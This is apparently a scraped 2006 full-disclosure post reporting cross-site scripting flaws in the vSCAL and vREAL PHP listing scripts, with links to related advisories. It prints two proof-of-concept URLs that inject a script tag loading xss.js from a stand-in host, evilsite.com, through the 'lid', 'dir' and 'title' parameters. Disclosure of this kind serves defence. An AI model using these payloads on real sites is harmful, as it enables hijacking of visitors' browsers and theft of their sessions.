Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [SA20515] WebFORM and FORM2MAIL Mail Header Injection Vulnerability [Full-disclosure] Docebo CMS 3.0.3, Remote command execution 'Multiple Sql injection and XSS in integramod portal PHP-Nuke <= 7.9 Search XSS Vulnerability From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com> Date:09.06.2006Subject:Babykatmedia.com scripts - vSCAL & vREAL - XSS VulnsvSCAL and vREAL v1.0 Homepage: http://www.babykatiemedia.com/ Effected files: index.php myslideshow.php XSS Vulnerability via lid variable: http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20 SRC=evilsite.com//xss.js></SCRIPT> XSS Vulnerability via myslideshow.php http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/&title =listing+317:+1966+Buick+<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[SA20515] WebFORM and FORM2MAIL Mail Header Injection Vulnerability
[Full-disclosure] Docebo CMS 3.0.3, Remote command execution
'Multiple Sql injection and XSS in integramod portal
PHP-Nuke <= 7.9 Search XSS Vulnerability
